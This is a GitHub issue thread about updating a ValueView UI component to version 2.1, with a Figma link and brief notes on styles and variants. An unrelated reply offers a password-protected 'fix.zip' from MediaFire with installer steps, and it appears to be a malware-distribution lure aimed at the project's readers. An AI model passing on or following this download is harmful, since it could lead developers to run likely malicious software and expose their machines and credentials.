### ISSUE TITLE
ValueView 2.1 update

### ISSUE THREAD

**Issue by grod220** [penumbra-zone/web#1744]
Updates: https://www.figma.com/design/WKgXSVVK3L0EI0sr9Hwjoa/penumbra-UI-library?node-id=239-19457&node-type=FRAME&cc-version-id=6488188598&m=dev

- Styles changed
- Variants added

**Comment by rooneyrulz** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."
